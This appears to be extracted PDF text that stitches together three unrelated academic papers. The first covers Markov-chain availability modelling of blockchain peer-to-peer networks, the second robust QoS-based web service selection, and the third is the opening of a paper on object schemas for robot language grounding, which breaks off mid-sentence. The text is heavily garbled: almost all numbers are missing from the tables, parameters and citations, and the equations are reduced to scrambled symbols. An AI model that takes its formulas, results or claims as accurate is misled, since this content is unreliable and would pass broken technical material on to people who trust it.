availability of the model, and finally carries out experimental verification through simulation, hoping to provide beneficial inspiration and guidance for future research on block chain network . keywords—blockchain; p p; markov; availability i. introduction block chain is a distributed system composed of encryption mechanism, storage mechanism, consensus mechanism, which can realize the peer-to-peer trading function of mutual trust without central server. the biggest feature of blockchain is decentralization and distribution, and the consensus mechanism of blockchain enables participating nodes to jointly provide services for the system and realizes similar functions of financial intermediaries in the central system. as shown in figure , blockchain system can achieve fast synchronization of data without central server and consistency of consensus mechanism through p p network. p p realizes the sharing of data resources and cooperation of services among terminal devices by means of direct exchange. however the dynamic and changeable of blockchain p p network, the requirement of the availability of block chain network becomes more and more important. from the development trend of p p network, the demand of modeling and verification evaluation on the availability of p p network is more and more common and urgent. the establishment of high availability mailto: @ .com mailto:fuyanfang @aliyun.com mailto:zhongli @sina.com international journal of advanced network, monitoring and controls volume , no. , network is the basis of accurate and timely information exchange, so as to meet the demand of network system to provide high reliable services for various users. consensus consistency inittrans address propagation discovery message communication check nodes seed nodes flooding distributed hash table consensus mechanism—p p network figure . the architecture of p p networks in the blockchain ii. related work the traditional concept of availability is a typical measure of reliability in reliability theory. it is an important parameter in reliability engineering that combines maintainability to represent the effectiveness of the system. "reliability" can only reflect the probability of failure of the network system or components, while "availability" can reflect the quality of the network by considering the repairability of the network. therefore, analyzing the availability of tact network system is an important index to evaluate the design of system networking, system stability and maintenance ability. at present, availability studies mainly focus on the reliability and maintainability of the engineering capability of complex systems, and also on the availability of mission capability. lianhong zhou established the availability model of optical fiber communication system by using the state transfer equation[ ]. hailin feng used markov theory to study the steady-state availability of repairable network system, and analyzed the fuzzy availability of repairable network system and continuous kn(f) network. fenghua xie studied the availability of "n+x" ups system and pointed out that the availability of parallel system was positively correlated with the number of redundant modules[ ]. jingle zhang proposed a workflow availability modeling method based on random petri net and studied and established the spn model of e-commerce system[ ]. jikun yang fused sample data with prior information, used fuzzy variables to deal with the uncertainty of sample data, and proposed a usability analysis method of navigation weapon system based on fuzzy bayes[ ]. above all of these, we can find that the research on the availability of p p network is relatively few and not very mature now. therefore, research available technology based on p p distributed collaborative network under different environmental conditions, analyze the unified modeling and expression of information, build a new generation of block chain network usability evaluation model, improve the information interaction and collaboration ability of block chain platform, and ensure the performance of system service and the formation of stable and reliable operation ability through availability technology. iii. distributed p p network structure basedon block chain block chain technology is the first kind that can be globally distributed deployment of consensus agreement. block chain system achieves efficient consensus through simple unauthenticated broadcast channel and block chain length competition mechanism. the typical blockchain system consists of network layer, consensus layer, data layer, intelligent contract layer and application layer[ ]. the network layer is usually based on p p protocol for communication between nodes; the consensus layer implements the consensus protocol, which can be freely selected according to the actual scenario, such as pow based on workload proof, and pos based on equity proof; the data layer is the data structure of the block chain, whose structural design is usually closely coupled with the application scenario according to the actual needs, each computing node is responsible for maintaining its own storage system; the intelligent international journal of advanced network, monitoring and controls volume , no. , contract layer can perform different operations for different data input, this process is automatically executed based on the code, and consensus is reached across the network; the application layer is the basic business of the block chain system, such as financial services and data traceability, etc. there is no central node in the block chain network based p p, and any two nodes can be directly traded, each node is free to join and exit at any time. therefore, the block chain platform usually chooses the p p protocol which is completely distributed and can tolerate single point of failure as the network transmission protocol. block chain network nodes have the characteristics of equality, autonomy and distribution, presenting a flat topology without any centralized authority nodes or hierarchical structure (as shown in figure ). each node has such functions as route discovery, broadcast transaction, and broadcast block and find new nodes[ ]. in the blockchain network, the p p protocol of the blockchain network is mainly used for the transfer of transaction data and block data between nodes. the node listens to the data broadcast in the network all the time. it can only be processed after by verifying the validity of these transactions and blocks when receives new transactions and new blocks sent by the neighbor node. c c c c c c figure . p p network topology iv. availability definition reliability is defined as the ability of a product to perform specified functions under specified conditions and within specified time periods. the higher the reliability, the lower the failure rate of the product. the simplest expression for reliability can be expressed as an exponential distribution, which expresses random failure. ( ) where, t is mission time, is failure rate. availability is defined as the ability to be in a state of executable function under specified conditions and at specified times or time intervals, provided that the required external resources are guaranteed. it is the comprehensive reflection of product reliability, maintainability and maintenance guarantee. the formula is as follows: ( ) mtbf(mean time between failure)refers to the average working time between two adjacent failures and is a reliability indicator of a product. mttr(mean time to repair)describes the average repair time when a product changes from a failure state to a working state. in engineering, mttr is a measure of the maintainability of a product, which is common in maintenance contracts and is used as a measure of service charges. according to the above analysis, "reliability" only reflects the probability of failure of the network system or components, while "availability" considers the repairability of the network and better reflects the quality of the network. steady-state availability and instantaneous availability are two characteristic quantities that reflect availability. therefore, analyzing the steady state availability and instantaneous availability of blockchain p p network system is an international journal of advanced network, monitoring and controls volume , no. , important index to evaluate the design of system networking, system stability and maintenance ability. v. markovavailability modeling p p network system is a complex system, its nodes states are changing at anytime, while the factors causing the change of the state of nodes mainly include hardware and software errors, human errors, natural disasters, malicious attacked, causing serious consequences to the network system, and even causing the entire network paralysis. the probability of occurrence of the first several factors is relatively small, while as an artificial means, the probability of occurrence of malicious attack is very high in the real war environment. a. markov chain model of the system in this paper, the p p network system targeted is a multi-state markov repairable system, assuming that its failures are caused by malicious attacks. the system is composed of several network nodes and several repair equipment. the life distribution of each node is , and the repair time after node failure is .all of these random variables are independent of each other, and after the fault node is repaired, its life will be the same as the new node. multi-state means that the nodes of the network system are damaged by attack, which may break one, two or more nodes; the number of fault nodes is different means the system state is different. in the process of system design, it is usually necessary to chose availability model to describe the availability of the system. the availability model adopted in this paper is the voting system model of take k in n. there are two types of voting system models of take k in n: one is a system of take k good nodes in n, which requires k or more of the n nodes of the system to be normal in order for the system to work normally, which is denoted as k/n[g]. the other kind is the system of take k bad nodes in n, which means that the system cannot work properly if k or more of the n nodes of the system fail, which is denoted as k/n[f][ ].this paper chose the second system model. when the fault nodes are less than k, the system works normally and repairs the fault nodes. when there are k node failures, the system will fail. at this time, the remaining normal working nodes will also stop working and will not fail. the system will work again until one node under repair is repaired and there are less than k nodes under repair. the system studied in this paper simplifies the actual situation, the n nodes of the system are considered to be one type of node. for example, because the importance of each node is different in practice, the life distribution and repair time of the node may be different, so the node types are not all the same. another example is that when a node fails, its workload must be borne by other nodes, thus accelerating the loss of other nodes. therefore, these idealized conditions are temporarily listed as assumptions, called the basic type for analysis. the number of fault nodes in the system is defined as the state of the system, i.e. * + where the working states of the system are * + obviously, the working quality (quality of service) of the different working nodes included in these working states is different, but it is not differentiated in the basic type analysis, and all of them are considered as normal working. x(t)=j indicates that there are j node faults in the system at time t that need to be repaired, i.e. it is in the state of j, where * +. node life and maintenance time obey the exponential distribution, according to the above, can prove to be time continuous multi-state time homogeneous markov chain, state transition probability in △t time is shown in the following formula ( ). represents the probability that the system is in state j at time t. this is the markov model of p p network multi-state repairable system. the state transition probability diagram of the system is shown international journal of advanced network, monitoring and controls volume , no. , in figure : (the state of transition to itself is not shown in the figure)                     t)o(t)(p , )k-(nt)(p k- ,k-n k-n, , ,jt),o(tj-tj)-(nt)(p jj, k-n, , ,jt),o(tjt)(p jj, k-n, , ,jt),o(tj)-(nt)(p jj, kj n       ( ) n-k n-k+ ... nλ t (n- )λ t kλ μ t μ t (n-k+ )μ figure . state transition diagram the state transition probability matrix is represented by a, as follow:                     )k-(n- )k-(n kk-n-k-k-n - )-(n- - )-(n- nn- )()(  ( ) b. steady-state availability of the system steady-state availability is one of the reliability characteristics of markov repairable system, which means the proportion of the whole running time of the network without dismemberment when the network reaches the steady-state, it is the probability of the network being connected. this index is essentially the probability of connectivity at any time in the steady state. according to the properties of homogeneous markov process: ( ) ( ) ( ) according to formula ( ), we get ∑ ( ) where is the probability distribution vector of state in steady state, ( ) , matrix a is substituted into equation ( ), and we get                          ) ( ) ( )) () (()( ) ) (( )) ((      kn kn kn k j j j jjn j jn nn nn n   ( ) the value can be obtained by solving the linear equations, and the steady-state availability of the system is ∑ ( ) c. instantaneous availability of the system instantaneous availability is also one of the reliability characteristics of markov repairable system. for some high-reliability systems like p p networks, it takes a long time to reach their stable state, and the steady-state availability may also be disturbed during the system operation. therefore, it is not enough to calculate the steady-state availability, but to consider the instantaneous index of the system. from the c-k equation, we can obtain that the instantaneous probability is:          ) (,, ) (, ) ( )()(t k rjirij ppp t p s p s p  ( ) the intuitive meaning of the c-k equation is start from state i and arrive at state j after s+ttime, and must first arrive at any state r after s time, and then transfer international journal of advanced network, monitoring and controls volume , no. , from state r to state j after t time. ( ) ( ) ( ) means that has a probability of and the other states have a probability of at the initial moment. equation ( ) is expressed as a matrix differential equation in the following form: { ( ) ( ) ( ) ( ) ( ) = ( ) ( ) ( ) represents the distributed probability of the system in various states at time t, is the row vector, and is also a one-dimensional matrix. ( ) represents the derivative matrix of instantaneous probability of the system at time t this is a system of first order linear differential equations, the general form of its solution is: ( ) ( ) ( ) ∑ ( ) since p and a are matrices, it is difficult to find the analytic expression of the above equation, we can use the laplace transform to find a simpler expression, and let ∗𝑗(𝑠) ∫ 𝑗( ) 𝑠 𝑑 𝑠 , the laplace transform of formula ( ) simplifies to ∗(𝑠) ∫ 𝑗( ) 𝑠 𝑑 ( )( ) 𝑠 ( ) where i is the identity matrix, ( ) can be obtained by inverting transform ∗( ) , then the instantaneous availability of the system is ( ) ∑ 𝑗( )𝑗 ( ) however, it is difficult to obtain analytic expressions by ∗( ) inverse transformation. results can be obtained by means of calculation tools, such as matlab, maple and other scientific calculation software. vi. examples validate take figure as an example, the number of network nodes is , and the minimum number of network nodes that can work normally is , that is / [f] voting system. according to equation ( ), steady-state availability i π of each state is obtained, and then according to equation ( ), steady-state availability a of the network system is obtained. table is for steady-state availability of each states and the system when μ= . hours and λ = hours, table is for steady-state availability of each states and the system when μ= . hours and λ = hours, and table is for steady-state availability of each states and the system when μ= hours and λ = hours. table i. steady-state availability calculation results steady-state availability .  .  .  . a . table ii. steady-state availability calculation results steady-state availability .  .  .  . a .   international journal of advanced network, monitoring and controls volume , no. , table iii. steady-state availability calculation results steady-state availability .  . π .  . a . as can be seen from table , and , as can be seen from table , and , the probability of is the largest, and the probability of and are very small, even negligible. table is the steady-state availability of a different μ and lambda system. figure is the curve trend diagram of table , a more intuitive reflection of how steady-state availability varies with μ and λ table iv. steady-state availability calculation resultsof the system . . . . . . . . . . . . . . . figure . steady-state availability trend diagram in table , the upper parameter is the node average failure parameter λ, the left parameter is μ. the x-coordinate of figure is the average node failure parameter λ, the y-coordinate is steady-state availability, and the four different curves are the average node repair time μ. as can be seen from table and figure , under the markov model, the steady-state availability of the system is very high, close to . the larger the λ, the smaller the μ, the more stable the system can be, which is consistent with the changing rules of p p networks. according to the analysis of . , p p network availability cannot be fully reflected by calculating steady-state availability. therefore, we also need to calculate the instantaneous availability of the system, and calculate the instantaneous availability of the system according to equations ( ) and ( ) with the parameters used in table . the results are shown in the following figure . in figure , the horizontal axis is time and the vertical axis is instantaneous availability. since k= , there are four curves in the instantaneous curves of multiple states, corresponding to and respectively. in order to make the graph more intuitive to reflect the change of the curve, the graph is divided into two parts, the left one are , and , with the vertical coordinate of to . , and the right one is , with the vertical coordinate of . to . when four nodes fail, the entire network system is down and the network is unavailable. from the figure, we can see that i.e. the zero nodes that are damaged gradually decrease from probability , and become stable after reaching a certain time point. the instantaneous availability of is very high, which is close to indefinitely. while the instantaneous availability of other states is relatively small, gradually increases with time until it becomes stable, while the instantaneous availability of and are very small, approaching infinitely. it can be seen that the probability of system failure is very  international journal of advanced network, monitoring and controls volume , no. , small. figure . instantaneous availability graphs of multiple states vii. conclusion for p p networks, the discrete time markov chain method is used to establish a model of state transition in p p networks in this paper, and the repairability of network nodes is considered. the calculation formulas of steady-state availability and instantaneous availability are given by using the model, and the results of the above calculation are obtained. the results are compared with the changing rules of the network system, which conforms to the availability requirements of the p p network. it shows that this model has certain reference value in the availability test of tactical p p network. references [ ] lianhong zhou. availability of fiber optic systems[j].tsinghua univ (sci& tech). . [ ] fenghua xie. modular ups reliability calculation and analysis[j].fuzzy systems & mathematics, . [ ] jingle zhang. availability analysis of flexible workflow based on stochastic petri net[j].computer engineering. . [ ] jikun yang. reliability and availability analysis of missile weapon system based on fuzzy bayesian theory[j]. journal of naval aeronautical and astronautical. [ ] qifeng shao. block chain: architecture and research progress[j].chinese journal of computers. , ( ): - [ ] antonopoulos a m. mastering bitcoin : unlocking digital cryptocurrencies[m].california:o’reilly media, : - . [ ] yongnian wang. reliability evaluation of k/n[g] system availability analysis of flexible workflow based on stochastic petri net. reliability analysis. : - [ ] geng yan. markov modeling method for availability of twoitem system under passivation[j].chinese journal of scientific instrument . : - [ ] yinan jiang. the method of network reliability and availability simulation based on monte carlo[j]. icqr mse. : - [ ] patrick wüchner. queueing networks & markov chains[m].wiley-interscience. : - [ ] du haidong. simulation assessment of degradation system reliability under imperfect maintenance[j]. journal of system simulation. , ( ): - [ ] ivanovitch, silva, luiz affonso, guedes, paulo, portugal, et al. reliability and availability evaluation of wireless sensor networks for industrial applications[j]. sensors, , ( ): - . [ ] datta a. an overview of codes tailor-made for better repairability in networked distributed storage systems[j]. acmsigact news, , ( ): - . [ ] yuan yong. blockchain: the state of the art and future trends [j]. actaautomaticasinica, , ( ) - [ ] wenli zhou. survey of p p technologies[j]. computers engineering and design , , ( ): - [ ] xuelong wang, jing zhang,, et al. survey on peer-to-peer key technologies[j]. application research of computers, , ( ): - , . international conference on sensor network and computer engineering (icsnce ) research on robust model for web service selection wei yanxi a* , yu fan b , ma xing, yu haige, yang wenhui school of computer science and engineering xi’an technological university xi’an, , shaanxi, china e-mail: b @qq.com, a @qq.com *the correspoding author abstract—most existing service quality models use defined quality of service parameters for service selection.since a large number of uncertainties exist, the qos performance indicators in the runtime of the composite services obtained through the model and method based on the determined qos will be worse even beyond the range acceptable to the users. web services can solve this problem and become the most reasonable solution in the current application environment. web services can solve this problem and become the most reasonable solution in the current application environment. in the process of actual service delivery, the key to the failure of the service composition to meet the requirements is caused by uncertain factors. in order to solve the above problems, this paper first proposes a local optimal selection model based on uncertain qos. the web service selection method based on uncertain qos has been progressing in recent years. second, in order to reduce the time spent on selection, a redundant service selection result is given. the experimental results on the data set show that the proposed model and method can effectively select more robust services for users. keywords-web service; quality of service; model robust i. introduction the service-oriented model must have three parts, the service provider, the client of the service, and the aggregator generated by the implementation service. it is well known that the tasks performed by the service provider usually provide not only the realization of services, but also the support for related technologies. the service client is a terminal organization that specifically utilizes the application service. in practice, it is the user. compared with the services, it is possible to integrate all services into a new service and the goals are achieved. this is usually called business process. services must remain technically neutral and need to follow some of the internationally recognized standards as much as possible. when calling a service, you must use standardized techniques. in this article, the focus is on the in-depth discussion of the characteristics of web services. he is a self-describing, self-contained software module that can be used over a network. the software module not only can complete the tasks and solve the problems, but also can fully represent the user and the application program to handle the transaction. as defined in the definition, the current known web services, the main structure is to establish a more application-oriented distributed computing infrastructure. the main content of a distributed infrastructure consists of many different application modules or interacting with each other to form a virtual logic system by communicating with the network or the public network. for the current research at home and abroad, qos-based web service selection algorithms mainly include: exhaustive, greedy, genetic, particle swarm optimization, ant colony optimization and algorithms. what this article uses is a robust qos-aware, reliable web service composition algorithm that is designed using robust algorithms. this paper mainly studies how to ensure that service portfolios are robust under uncertain conditions, thus avoiding the re-planning of portfolio services to some extent. the application of robust optimization method to service selection model based on uncertain qos is described in detail. ii. web services discussion and robust optimization a. web service features web services are mainly distributed computer technologies, which are based on xml and internet technologies. platform-independent, loosely-coupled, self-contained, programmable web-based applications are used for development-oriented, interoperable applications that can use open xml standards to describe, publish, and discover. coordinate and configure these applications, these are all part of the full definition of web services. the basic architecture of web services consists of participants and basic operations for example, figure . service provide service broker service providefind figure . the basic architecture of web services the combined strategy of web services provides a global-wide information infrastructure for the development of internet technology. international conference on sensor network and computer engineering (icsnce ) this continuously expanding infrastructure forms a resource-rich computing platform and forms the basis of human society's information . therefore, a single atomic web service can no longer satisfy the diversified and personalized needs of users. the existing web services have become the most effective and direct resources to solve the current problems encountered. from the perspective of web properties, web services are loosely coupled and highly integrated. these two features are web services. the combination offers possibilities. resqurce service profel service service mode service grounding provides supports d e s c r ip t io n figure . describing the relationship of information services b. the role of qos in service selection qos is actually a kind of ability to express web services. if you can achieve the requests needed to respond to expectations in the application process, not only can you complete related tasks, but also the quality of service provided by different users of service providers. introducing qos into web services and using qos of web services to distinguish web services with similar functions are the mainstream technologies currently applied in society. qos-based web service selection is gradually playing an increasingly important role in service composition. the increasing complexity of component-based web services building services in the current development and the increasing trend of their associated systems is due to the development of web composition technologies. the problem of web service composition is a well-known issue in mainstream development. on the one hand, web services that run on different platforms in their heterogeneous systems can be created in different ways, or can be implemented in different languages. or it can be provided by different suppliers, and its source and structure are various. how to choose the right web service composition system to build the required composite service is an important research direction. c. robust optimization overview robust optimization has a wide range of application bases, and most of the studies on traditional optimization problems are deterministic. establish a rationalized model in the process to ensure that it is essential for every aspect of the entire web service process. the goal of robust optimization is to find a solution that can handle all possible uncertain data. the robust optimization proposed by soyster is to consider the "worst case" when the disturbance is maximum, that is, to consider the most unfavorable situation, transform the uncertainty plan into a deterministic corresponding model, and obtain a robust optimal solution by solving the deterministic correspondence model. since this model only considers the worst case, the result obtained is too "conservative", which means that this result is only a better solution for the possible realization of all uncertain data. the later research focuses on how to keep the solution optimal while maintaining the optimality of the solution. at the end of the last century, ben-tal and nemirovski gave the robust equality problem of converting the linear programming to the secondary cone programming under the "ellipsoidal" uncertain set. however, after the conversion, the problem is more complicated and difficult to calculate. in , bertsimas and sim proposed a new robust model and obtained the solution considering both optimality and robustness. at the same time, the probability of the solution violated the constraint was analyzed. then the uncertain discrete problem was studied to solve the network flow problem. a discrete robust model is given for the object. based on the above two theoretical methods, domestic scholars apply robust optimization to supply chain planning, network flow, and logistics planning. generally, in the service selection process based on qos determination, it is often necessary to aggregate different qos attribute values of the same service as the value for calculating or comparing the same service, or to determine the same attribute of different services according to the determined combined service workflow. the aggregate becomes a global property value. however, in the case of uncertain qos, because the description methods of qos attributes themselves are not the same, there are differences in the description of the uncertainty of different qos, it is difficult to use different methods of the same service to determine the value of different attributes of the same service. get together. for example, suppose that the response time fluctuation range is [rt , rt ] and the throughput fluctuation range is [tp , tp ]. the smaller one is, the better, and the bigger the other is, the better is the different types, the units are different, and the numerical quantities are different. it is difficult to aggregate two attributes with uncertainty in a way that determines the model using - normalization combined with a weighted sum. at the same time, because of the uncertainty of qos, it is difficult to obtain the uncertainty of the global qos in the solution process according to the superposition (such as response time superposition) or continuous multiplication (such as reliability multiplication) without affecting the solution result. therefore, this article will establish local optimization service selection model for a single qos attribute. assume that there are n tasks in the workflow of a composite service, and there are a large number of web services in each task. these services can complete the task and they have different functional attributes. this article discusses the service selection under the local optimal strategy. we mention that the local optimal strategy is to select individual service classes and examine the candidate atomic service sets of each abstract service class. workflows have control structures such as sequence, selection, loop, and parallel. without losing the generality, it is assumed that a sequential process with tasks is used as the combined service process international conference on sensor network and computer engineering (icsnce ) model in this paper, and service selection is performed for the first task in the process. iii. experiments a. experiment analysis the environment used in this experiment was tensorflow-gpu . . open source software library, windows in order to verify the effectiveness of the proposed method, a prototype system of web service test and selection management was developed in the early stage of the research. in the past, researchers usually used solving data to determine the model, using data to measure the service qos alone, or randomly generating some values within a range for simulation. in this paper, researches and calculations are conducted on uncertain data. uncertainty in the use of the service description cannot be confirmed by a single test or a randomly generated value. the minimum response time of the service call can reflect the level of its optimality; the maximum response time reflects the level of robustness; the expectation reflects the average response value of the response time; the variance mainly reflects the response time of each call. the deviation from the expected response time of the service, that is, the smaller the variance, the smaller the response time of service invocation and the more stable. b. experiment datasets adjust the value of  . in the experiment, since  can only take values between [ , ], six values of   , . , . , . , . ,  are chosen for solving. the specific results are shown in table . table i. solving the result t values . . . . . . service number z*(t) . . . . . . . . iv. conclusion this paper presents the application of robust optimization method in the selection of web services based on uncertain qos. on the basis of determining the qos-based web service selection method, considering the uncertainty of qos, a single uncertain qos service selection model based on the local optimal strategy is established. after the redundant service is removed, the robust optimization of the uncertain processing problem is used. the method converts and solves the service selection model based on uncertain qos and obtains a solution that takes both robustness and optimal solution into account. in the final experiment, the paper verifies the validity of the proposed model and method, and verifies the effect of redundant service culling strategy on the efficiency of the solution. the web service composition based on uncertain qos has the following advantages: first, for software developers, paying attention to personalized web service composition can improve user acceptance, enhance product competitiveness and enhance corporate reputation efficiency. second, for users and users, the importance of personalized web service composition can improve user productivity, reduce training and technology support costs, improve user comfort and satisfaction, and increase investment efficiency and efficiency of system construction. third, personalized research under uncertainty will improve the accuracy of service provision, give full play to the potential of every service and the effect of other services cooperation. references [ ] s.bing,c.jiayong .research and application of dynamic web service composition based on qos. - - . [ ] c.ming,s.baoning.research and application of web service composition. - - [ ] x.jei.web service selection algorithm review journal. - - [ ] y.jian,h.yanbo.service-oriented computing--principles . - [ ] l.wei,y.bing,z.defeng.qos-based dynamic service portfolio journal. - - [ ] j.zheyuan,h.jiangbo.dynamic qos-aware web service selection and combination optimization model. - [ ] http://www.ijanmc.org/current.htm.research and implementation for a class of large-scale full-range power system real-time simulator.www.ijanmc.org. [ ] gu wei, wang jihua, zhang yan, gui junguo, and xu meimei. a study and simulation on thermal cycling system of cfb boilerwww.ijanmc.org. [ ] http://www.ijanmc.org/current.htm.fine-grained access control scheme based on cloud storage. http://www.ijanmc.org/ /iccnea - .pdf http://www.ijanmc.org/ /iccnea - .pdf http://www.ijanmc.org/ /iccnea - .pdf http://www.ijanmc.org/ http://www.ijanmc.org/ /iccnea - .pdf http://www.ijanmc.org/ /iccnea - .pdf http://www.ijanmc.org/ /iccnea - .pdf http://www.ijanmc.org/ /iccnea - .pdf http://www.ijanmc.org/ /iccnea - .pdf http://www.ijanmc.org/ /iccnea - .pdf word template for authors, eias style b object schemas for grounding language in a responsive robot k a i - yu h hsi ao a * , s te f an i e t el le x a , s o ro u sh v o sou g hi a , r o n y k ub a t a , d e b ro y a amit media laboratory, mit, cambridge, massachusetts, usa abstract we introduce an approach for physically-grounded natural language interpretation by robots which reacts appropriately to unanticipated physical changes in the environment and dynamically assimilates new information pertinent to ongoing tasks. at the core of the approach is a model of object schemas that enables a robot to encode beliefs about physical objects in its environment using collections of coupled processes responsible for sensorimotor interaction. these interaction processes run concurrently in order to ensure responsiveness to the environment, while coordinating sensorimotor expectations, action planning, and language use. the model has been implemented on a robot that manipulates objects on a tabletop in response to verbal input. the implementation responds to verbal requests such as “group the green block and the red apple,” while adapting in real-time to unexpected physical collisions and taking opportunistic advantage of any new information it may receive through perceptual and linguistic channels. keywords: object schema; language grounding; human-robot interaction; semantics _____________________ *corresponding author. aemails: {eepness, stefie , soroush, kubat, dkroy}@media.mit.edu mailto:soroush@media.mit.edu mailto:kubat@media.mit.edu object-centred, behaviour-based language grounding natural language is an efficient means by which humans convey beliefs and desires to other people. analogously, a robot system that uses natural language could communicate more efficiently with humans. the conceptual structures required for language use could also help the robot interact with an environment generally designed by humans for human use. for a robot with a physical body to make sense of language, the robot's internal representations need to be grounded in the real world, meaning that the robot must have processes that relate its words and concepts to its perceptions and actions in systematic ways. for instance, a language-using robot must identify the perceptual referents of nouns, and it must translate verbs into appropriate motor behaviour. a physical robot, however, also needs to stay responsive to changes in its environment. this is the premise of behaviour-based robot design, as argued by brooks [ ] and numerous others. in this paper we present a model for language grounding that addresses the need for responsiveness without sacrificing the ability to form structured internal representations of a kind necessary to support symbolic communication. at the core of the model are object schemas, in which running processes are organized according to the physical object towards which they are directed, and by which they are causally affected. the object schema processes run concurrently to ensure responsiveness of the robot to its environment. the object schemas built from the processes provide object representations for planning and language use. the model builds upon an underlying theoretical object schema framework developed in [ , ]. to demonstrate the efficacy of these constructs, we have implemented a robotic system in which the object schemas assist the coordination of vision, touch, motor action, planning, and language use, in a tabletop domain. figure shows the robot, trisk, performing a behaviour sequence enabled by the model. in this paper we first situate our approach with respect to related work in the field. then, we explain the model and describe selected aspects of the implementation in greater detail. background our model brings together behaviour-based design and language grounding, combined through a sensorimotor schema representation of objects. in this section we review some related work and highlight some benefits of our model. smpa and non­linguistic behaviour­based robots from the days of shakey (the first language-using robot [ ]) the “traditional” approach for robot planning and control was what brooks eventually called the “sense-model-plan-act” approach (smpa). the idea behind smpa is that sensory input is interpreted as a model of the external world, the model is used for planning purposes, and then the plans are used to guide action. the smpa model naturally supports language use. for example, verbal commands can be translated into plans that are inserted into the plan layer of an smpa system. likewise, verbal descriptions of world state can be translated into elements of the model layer. as an alternative to the smpa approach, brooks [ , ] developed the subsumption architecture, an early example of behaviour-based robot control. behaviour-based approaches focus first and foremost on the responsiveness of the robot to unexpected (and thus unmodelled) changes in the environment. the subsumption architecture maintains responsiveness by decomposing a task into separate behaviours and having a dedicated process handle all aspects of each specific behaviour, from sensory input to motor output. behaviour processes interact through layered control interrupts. brooks identified the use of internal models of the environment as the primary culprit for impeding responsiveness to change, and as a result, argued against explicit internal models altogether. this prohibition, however, leaves no clear path for language processing, which is fundamentally a “representation-hungry” task [ ]. later work on behaviour-based robots have introduced some degree of representation and planning by layering these elements on top of reactive processes. for instance, some of the three-layer systems developed to date [ , , , ] allow reactive behaviours (such as collision-avoidance) to compete with more complex planned behaviours (such as mapping and path planning) as part of an action selection process. representations in such systems focus primarily on behaviours and task decomposition. object representation behaviour-based robots have been successfully deployed in a number of real world systems, demonstrating how much can be accomplished with a minimum of representation. however, the raw sensorimotor processing of the subsumption architecture and the action representations of the later systems have limitations with respect to human communication and acting in human-centric environments. adding representations of physical objects is important for several reasons: communicating about objects human language use is full of statements about objects, suggesting that explicitly representing objects will enable the robot to efficiently handle such language. planning actions representing objects would allow a robot to plan coherent sequences of actions towards goals expressed in terms of objects and their states. coordinating expectations the conception of objects and object permanence may provide an efficient means for a robot to generate structured predictions of incoming sensory input, and to predict changes in the environment as a result of specific actions taken by the robot. because of the importance of objects in communication and planning, our object schema model organizes processes according to the object they target. there are several other systems that explicitly represent physical objects. here we relate them to our approach: object persistence and tracking several projects inspired by behaviour-based design, such as those led by blumberg et al. [ , ] and later breazeal et al. [ , ] remain reactive while updating object representations continuously. however, in these models much of the object processing is decoupled from the object representations themselves, making it inconvenient to represent object-directed affordances (i.e., actions that can be taken and states that can be achieved by the agent, due to the object [ ]) such as “liftable” and “graspable.” because the processes that target an object are contained within our object schemas, affordance information can be stored alongside the corresponding processes in our object representation. this simplifies the grounding of affordance-related words. affordance learning several systems do represent object affordances explicitly, for instance for learning affordances [ , , , ]. learning is a vital future direction for our work as well, but our current emphasis is on developing a richer affordance-centred representation of objects that can support language use and responsive behaviour. the model that is presented in this paper is influenced by the piagetian idea of a sensorimotor schema [ ]. both arbib [ ] and drescher [ ] have developed computational interpretations of piaget's concept of schemas. drescher's schema mechanism is an early attempt to fully implement schemas and test them in a simulated world. drescher strived for a learning system that minimized “innate” structures, preferring a highly data-driven learning system that constructed primitive object schemas out of very low level sensorimotor primitives. in practice the implementations based on this approach failed to scale to environments beyond extremely simple grid-worlds. in contrast, our approach provides fairly rich built-in structures in the form of robotic controllers and perceptual processing routines with the goal of implementing more capable systems that demonstrate robust real world object-directed behaviour. drescher's work suggests future directions for introducing structure learning capabilities into our approach by “deconstructing” our innate schema structures and enabling the system to reconstruct schemas based on experience. under the schema view, objects are a useful abstraction that brings structure to otherwise incoherent and overwhelming sensorimotor experience. a system with no object representation would have to explicitly encode an enormous network of sensorimotor expectations just to gain basic abilities like object persistence, while a system with an object representation can expect that a green object will continue to appear green. object schemas thus enable the system to organize perceptions and actions in ways that matter to the system's programmed goals. our model provides a computational/mechanistic interpretation of the schema concept with sufficient detail to implement on a physical robot. reactive grounded language robots several mobile robot systems include the ability to take verbal commands [ , , , ]. some of these robots can also run collision-avoidance behaviours in competition with verbally-commanded behaviours, using a mechanism like those in a subsumption-based system. in essence, such systems use smpa-based language grounding grafted atop a behaviour-based reactive robot, granting the benefits of both a full representation and behaviour-based responsiveness. figure shows a depiction of this model. however, our object schema approach is specifically not adding smpa to a reactive robot. rather than temporally interspersing responsive behaviours with language use and planning, our approach constructs object representations for language use and planning using the responsive behaviours, so a sensorimotor event can rapidly alter linguistic and planning structures and processes. a collision with an object not only causes our robot to pull back to avoid damage, but the process handling the collision also provides updated knowledge of the object's expected location, altering the target location for subsequent verbally-commanded grasping actions. in contrast, the reactive smpa approach would use separate processes for collision- handling and for building a model from sensory input to locate objects for verbal command processing. our object schemas are thus more adept at leveraging information from the reactive level. a high-level overview of our approach is depicted in figure to contrast with the preceding smpa diagram. other grounded language systems numerous previous efforts have addressed language grounding either in physical or virtual worlds (see [ ] for a survey of models of word grounding, and a collection of recent papers on the topic introduced in [ ]). winograd's shrdlu [ ] carried out natural language commands in a symbolic “simulator” of a blocks-world manipulation robot. while winograd abstracted away many of the core issues we focus on here related to interacting with and representing real objects, shrdlu's linguistic performance remains impressive to this day. many other language-grounding systems such as [ , , ] connect aspects of language use or word meaning to perceptual features grounded in objects, but do not address the underlying problem of how a machine might conceive of objects in the first place. several other researchers pairing language and robotics [ , , ] focus on evolving novel languages between agents or robots trying to communicate. our focus is on representations specifically appropriate to pre-existing human languages that can be used in human-robot interaction tasks. in our previous work we developed a robot called ripley that is able to respond to spoken commands such as “hand me the blue one on your left” [ , ]. ripley was not, however, responsive to changes or corrections, and action failures had no impact on decision-making beyond a simple retry mechanism. in contrast, our new approach uses a planning mechanism to make decisions, respond to sudden changes, and replan dynamically. interaction processes and the object schema model as described in the “reactive grounded language robots” section above, an smpa model built on top of a reactive robot system could carry out verbal tasks, but its reactive processes would function independently of the verbal processing. in contrast, our object schema model coordinates language use, planning, and sensorimotor expectations by using object representations built out of the reactive processes. we call these processes interaction processes (in this context we sometimes just call them “processes” for brevity), and they form the basic building block of the model. the interaction processes are simultaneously organized into object schemas, which represent objects, and plan hierarchies, which coordinate action planning. for language purposes, the object schemas and plan hierarchies both serve as representations that language can be grounded to. for example, noun phrases can connect to the object schemas, and verb phrases in commands can connect to the plan hierarchies. in this section we describe the model in greater detail. interaction processes and histories the fundamental building block of the 